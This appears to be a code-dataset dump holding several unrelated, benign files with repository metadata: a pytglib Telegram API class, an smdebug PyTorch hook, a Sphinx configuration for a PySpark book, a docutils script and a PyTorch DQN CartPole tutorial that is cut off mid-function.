check(launch['scanResult'], 'jobID', str)
check(launch['scanResult'], 'name', str)
check(launch['scanResult'], 'description', str, allow_none=True)
check(launch['scanResult'], 'details', str)
check(launch['scanResult'], 'status', str)
check(launch['scanResult'], 'downloadFormat', str)
check(launch['scanResult'], 'dataFormat', str)
check(launch['scanResult'], 'id', str)
| true
| true
|
1c445eaf4b2ea2fc8a00bd7b0b9e80eef01719f8
| 1,179
|
py
|
Python
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/pytglib
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 6
|
2019-10-30T08:57:27.000Z
|
2021-02-08T14:17:43.000Z
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 1
|
2021-08-19T05:44:10.000Z
|
2021-08-19T07:14:56.000Z
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 5
|
2019-12-04T05:30:39.000Z
|
2021-05-21T18:23:32.000Z
|
from ..utils import Object
class SetStickerSetThumbnail(Object):
"""
Sets a sticker set thumbnail; for bots only. Returns the sticker set
Attributes:
ID (:obj:`str`): ``SetStickerSetThumbnail``
Args:
user_id (:obj:`int`):
Sticker set owner
name (:obj:`str`):
Sticker set name
thumbnail (:class:`telegram.api.types.InputFile`):
Thumbnail to set in PNG or TGS formatAnimated thumbnail must be set for animated sticker sets and only for themYou can use a zero InputFileId to delete the thumbnail
Returns:
StickerSet
Raises:
:class:`telegram.Error`
"""
ID = "setStickerSetThumbnail"
def __init__(self, user_id, name, thumbnail, extra=None, **kwargs):
self.extra = extra
self.user_id = user_id # int
self.name = name # str
self.thumbnail = thumbnail # InputFile
@staticmethod
def read(q: dict, *args) -> "SetStickerSetThumbnail":
user_id = q.get('user_id')
name = q.get('name')
thumbnail = Object.read(q.get('thumbnail'))
return SetStickerSetThumbnail(user_id, name, thumbnail)
| 28.756098
| 177
| 0.625106
|
from ..utils import Object
class SetStickerSetThumbnail(Object):
ID = "setStickerSetThumbnail"
def __init__(self, user_id, name, thumbnail, extra=None, **kwargs):
self.extra = extra
self.user_id = user_id
self.name = name
self.thumbnail = thumbnail
@staticmethod
def read(q: dict, *args) -> "SetStickerSetThumbnail":
user_id = q.get('user_id')
name = q.get('name')
thumbnail = Object.read(q.get('thumbnail'))
return SetStickerSetThumbnail(user_id, name, thumbnail)
| true
| true
|
1c445eb15f606a0339ceffedf26e0ebbcac914b2
| 1,036
|
py
|
Python
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,610
|
2020-10-01T14:14:53.000Z
|
2022-03-31T18:02:31.000Z
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 1,959
|
2020-09-30T20:22:42.000Z
|
2022-03-31T23:58:37.000Z
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,052
|
2020-09-30T22:11:46.000Z
|
2022-03-31T23:02:51.000Z
|
import smdebug.pytorch as smd
import torch
from smdebug.core.modes import ModeKeys
class CustomHook(smd.Hook):
# register input image for backward pass, to get image gradients
def image_gradients(self, image):
image.register_hook(self.backward_hook("image"))
def forward_hook(self, module, inputs, outputs):
module_name = self.module_maps[module]
self._write_inputs(module_name, inputs)
# register outputs for backward pass. this is expensive, so we will only do it during EVAL mode
if self.mode == ModeKeys.EVAL:
outputs.register_hook(self.backward_hook(module_name + "_output"))
# record running mean and var of BatchNorm layers
if isinstance(module, torch.nn.BatchNorm2d):
self._write_outputs(module_name + ".running_mean", module.running_mean)
self._write_outputs(module_name + ".running_var", module.running_var)
self._write_outputs(module_name, outputs)
self.last_saved_step = self.step
| 38.37037
| 103
| 0.696911
|
import smdebug.pytorch as smd
import torch
from smdebug.core.modes import ModeKeys
class CustomHook(smd.Hook):
def image_gradients(self, image):
image.register_hook(self.backward_hook("image"))
def forward_hook(self, module, inputs, outputs):
module_name = self.module_maps[module]
self._write_inputs(module_name, inputs)
if self.mode == ModeKeys.EVAL:
outputs.register_hook(self.backward_hook(module_name + "_output"))
if isinstance(module, torch.nn.BatchNorm2d):
self._write_outputs(module_name + ".running_mean", module.running_mean)
self._write_outputs(module_name + ".running_var", module.running_var)
self._write_outputs(module_name, outputs)
self.last_saved_step = self.step
| true
| true
|
1c445f46b78f84e0666b4e389bddb6811327d7dd
| 14,259
|
py
|
Python
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 213
|
2017-09-25T05:49:50.000Z
|
2022-03-01T15:26:26.000Z
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 4
|
2019-05-06T09:15:34.000Z
|
2021-10-15T07:47:40.000Z
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 92
|
2019-03-03T23:17:24.000Z
|
2022-03-23T22:25:14.000Z
|
# -*- coding: utf-8 -*-
#############################################################################
# I heavily borrowed, modified and used the configuration in conf.py of Theano
# package project. I will keep all the comments from Theano team and the
# coryright of this file belongs to Theano team.
# reference:
#
# Theano repository: https://github.com/Theano/Theano
# conf.py: https://github.com/Theano/Theano/blob/master/doc/conf.py
##############################################################################
# theano documentation build configuration file, created by
# sphinx-quickstart on Tue Oct 7 16:34:06 2008.
#
# This file is execfile()d with the current directory set to its containing
# directory.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
from __future__ import absolute_import, print_function, division
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import versioneer
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.doctest',
'sphinx.ext.napoleon',
'sphinx.ext.linkcode',
'sphinx.ext.intersphinx'
]
todo_include_todos = True
napoleon_google_docstring = False
napoleon_include_special_with_doc = False
# We do it like this to support multiple sphinx version without having warning.
# Our buildbot consider warning as error.
try:
from sphinx.ext import imgmath
extensions.append('sphinx.ext.imgmath')
except ImportError:
try:
from sphinx.ext import pngmath
extensions.append('sphinx.ext.pngmath')
except ImportError:
pass
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Learning Apache Spark with Python'
copyright = '2017, Wenqiang Feng'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# We need this hokey-pokey because versioneer needs the current
# directory to be the root of the project to work.
# The short X.Y version.
# version = '1.00'
# The full version, including alpha/beta/rc tags.
# release = '1.00'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
exclude_dirs = ['images', 'scripts', 'sandbox']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# Enable link of 'View page source'
html_show_sourcelink = False
# Add 'Edit on Github' link instead of 'View page source'
# reference:https://docs.readthedocs.io/en/latest/vcs.html
# html_context = {
# # Enable the "Edit in GitHub link within the header of each page.
# 'display_github': True,
# # Set the following variables to generate the resulting github URL for each page.
# # Format Template: https://{{ github_host|default("github.com") }}/{{ github_user }}
# #/{{ github_repo }}/blob/{{ github_version }}{{ conf_py_path }}{{ pagename }}{{ suffix }}
# #https://github.com/runawayhorse001/SphinxGithub/blob/master/doc/index.rst
# 'github_user': 'runawayhorse001',
# 'github_repo': 'SphinxGithub',
# 'github_version': 'master/doc/' ,
# }
# {% if display_github %}
# <li><a href="https://github.com/{{ github_user }}/{{ github_repo }}
# /tree/{{ github_version }}{{ conf_py_path }}{{ pagename }}.rst">
# Show on GitHub</a></li>
# {% endif %}
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'default.css'
# html_theme = 'sphinxdoc'
# Read the docs style:
if os.environ.get('READTHEDOCS') != 'True':
try:
import sphinx_rtd_theme
except ImportError:
pass # assume we have sphinx >= 1.3
else:
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme = 'sphinx_rtd_theme'
def setup(app):
app.add_stylesheet("fix_rtd.css")
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = 'images/theano_logo_allwhite_210x70.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'images/icon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'spnixgitdoc'
# Options for the linkcode extension
# ----------------------------------
# Resolve function
# This function is used to populate the (source) links in the API
def linkcode_resolve(domain, info):
def find_source():
# try to find the file and line number, based on code from numpy:
# https://github.com/numpy/numpy/blob/master/doc/source/conf.py#L286
obj = sys.modules[info['module']]
for part in info['fullname'].split('.'):
obj = getattr(obj, part)
import inspect
import os
fn = inspect.getsourcefile(obj)
fn = os.path.relpath(fn, start=os.path.abspath('..'))
source, lineno = inspect.getsourcelines(obj)
return fn, lineno, lineno + len(source) - 1
if domain != 'py' or not info['module']:
return None
try:
filename = '%s#L%d-L%d' % find_source()
except Exception:
filename = info['module'].replace('.', '/') + '.py'
#https://github.com/runawayhorse001/LearningApacheSpark/blob/master/pyspark/ml/clustering.py
return "https://github.com/runawayhorse001/LearningApacheSpark/blob/master/%s" % (filename)
# Options for LaTeX output
# ------------------------
latex_elements = {
# The paper size ('letter' or 'a4').
#latex_paper_size = 'a4',
# The font size ('10pt', '11pt' or '12pt').
'pointsize': '11pt',
# Additional stuff for the LaTeX preamble.
#latex_preamble = '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'pyspark.tex', 'Learning Apache Spark with Python',
'Wenqiang Feng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'images/logo.jpg'
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = 'images/snake_theta2-trans.png'
#latex_logo = 'images/theano_logo_allblue_200x46.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
#latex_elements['preamble'] = '\usepackage{xcolor}'
# Additional stuff for the LaTeX preamble.
#latex_preamble
latex_elements['preamble'] = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\bU{\\mathbf{U}}\n'+\
'\\def\\bV{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
#pngmath_divpng_args = ['-gamma', '1.5', '-D', '110', '-bg', 'Transparent']
imgmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\U{\\mathbf{U}}\n'+\
'\\def\\V{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
| 37.822281
| 96
| 0.580125
|
ntities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'spnixgitdoc'
# Options for the linkcode extension
# ----------------------------------
# Resolve function
# This function is used to populate the (source) links in the API
def linkcode_resolve(domain, info):
def find_source():
# try to find the file and line number, based on code from numpy:
# https://github.com/numpy/numpy/blob/master/doc/source/conf.py#L286
obj = sys.modules[info['module']]
for part in info['fullname'].split('.'):
obj = getattr(obj, part)
import inspect
import os
fn = inspect.getsourcefile(obj)
fn = os.path.relpath(fn, start=os.path.abspath('..'))
source, lineno = inspect.getsourcelines(obj)
return fn, lineno, lineno + len(source) - 1
if domain != 'py' or not info['module']:
return None
try:
filename = '%s#L%d-L%d' % find_source()
except Exception:
filename = info['module'].replace('.', '/') + '.py'
#https://github.com/runawayhorse001/LearningApacheSpark/blob/master/pyspark/ml/clustering.py
return "https://github.com/runawayhorse001/LearningApacheSpark/blob/master/%s" % (filename)
# Options for LaTeX output
# ------------------------
latex_elements = {
# The paper size ('letter' or 'a4').
#latex_paper_size = 'a4',
# The font size ('10pt', '11pt' or '12pt').
'pointsize': '11pt',
# Additional stuff for the LaTeX preamble.
#latex_preamble = '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'pyspark.tex', 'Learning Apache Spark with Python',
'Wenqiang Feng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'images/logo.jpg'
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = 'images/snake_theta2-trans.png'
#latex_logo = 'images/theano_logo_allblue_200x46.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
#latex_elements['preamble'] = '\usepackage{xcolor}'
# Additional stuff for the LaTeX preamble.
#latex_preamble
latex_elements['preamble'] = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\bU{\\mathbf{U}}\n'+\
'\\def\\bV{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
#pngmath_divpng_args = ['-gamma', '1.5', '-D', '110', '-bg', 'Transparent']
imgmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\U{\\mathbf{U}}\n'+\
'\\def\\V{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
| true
| true
|
1c445f905b74048639cccb3e88f2f31191f6f596
| 151
|
py
|
Python
|
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
# Create a program that takes two variables, divides them,
# and prints the quotient.
x = 42
y = 2
if x == 42:
if y == 2:
print (x // y)
| 15.1
| 58
| 0.576159
|
x = 42
y = 2
if x == 42:
if y == 2:
print (x // y)
| true
| true
|
1c4460629d5ab0bb165c86640050ec517f98b099
| 645
|
py
|
Python
|
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
#!/Users/mcclainthiel/Desktop/WH/WH_Utils2/.venv/bin/python3.9
# $Id: rst2pseudoxml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing pseudo-XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
| 26.875
| 73
| 0.744186
|
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
| true
| true
|
1c4460c9572f72b3583be0b06bb5fb540edd3e8f
| 6,720
|
py
|
Python
|
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
import gym
import math
import random
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from collections import namedtuple, deque
from itertools import count
from PIL import Image
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.transforms as T
env = gym.make("CartPole-v0").unwrapped
is_ipython = "inline" in matplotlib.get_backend()
if is_ipython:
from IPython import display
plt.ion()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
Transition = namedtuple("Transition", ("state", "action", "next_state", "reward"))
class ReplayMemory(object):
def __init__(self, capacity):
self.memory = deque([], maxlen=capacity)
def push(self, *args):
"""Save a transition"""
self.memory.append(Transition(*args))
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
class DQN(nn.Module):
def __init__(self, h, w, outputs):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)
self.bn2 = nn.BatchNorm2d(32)
self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.bn3 = nn.BatchNorm2d(32)
def conv2d_size_out(size, kernel_size=5, stride=2):
return (size - (kernel_size - 1) - 1) // stride + 1
convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))
convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))
linear_input_size = convw * convh * 32
self.head = nn.Linear(linear_input_size, outputs)
def forward(self, x):
x = x.to(device)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
return self.head(x.view(x.size(0), -1))
resize = T.Compose([T.ToPILImage(), T.Resize(40, interpolation=Image.CUBIC), T.ToTensor()])
def get_cart_location(screen_width):
world_width = env.x_threshold * 2
scale = screen_width / world_width
return int(env.state[0] * scale + screen_width / 2.0)
def get_screen():
screen = env.render(mode="rgb_array").transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
screen = screen[:, int(screen_height * 0.4) : int(screen_height * 0.8)]
view_width = int(screen_width * 0.6)
cart_location = get_cart_location(screen_width)
if cart_location < view_width // 2:
slice_range = slice(view_width)
elif cart_location > (screen_width - view_width // 2):
slice_range = slice(-view_width, None)
else:
slice_range = slice(cart_location - view_width // 2, cart_location + view_width // 2)
screen = screen[:, :, slice_range]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
env.reset()
plt.figure()
plt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(), interpolation="none")
plt.title("Example extracted screen")
plt.show()
BATCH_SIZE = 128
GAMMA = 0.999
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
TARGET_UPDATE = 10
init_screen = get_screen()
_, _, screen_height, screen_width = init_screen.shape
n_actions = env.action_space.n
policy_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net.load_state_dict(policy_net.state_dict())
target_net.eval()
optimizer = optim.RMSprop(policy_net.parameters())
memory = ReplayMemory(10000)
steps_done = 0
def select_action(state):
global steps_done
sample = random.random()
eps_threshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1.0 * steps_done / EPS_DECAY)
steps_done += 1
if sample > eps_threshold:
with torch.no_grad():
return policy_net(state).max(1)[1].view(1, 1)
else:
return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)
episode_durations = []
def plot_durations():
plt.figure(2)
plt.clf()
durations_t = torch.tensor(episode_durations, dtype=torch.float)
plt.title("Training...")
plt.xlabel("Episode")
plt.ylabel("Duration")
plt.plot(durations_t.numpy())
if len(durations_t) >= 100:
means = durations_t.unfold(0, 100, 1).mean(1).view(-1)
means = torch.cat((torch.zeros(99), means))
plt.plot(means.numpy())
plt.pause(0.001)
if is_ipython:
display.clear_output(wait=True)
display.display(plt.gcf())
def optimize_model():
if len(memory) < BATCH_SIZE:
return
transitions = memory.sample(BATCH_SIZE)
batch = Transition(*zip(*transitions))
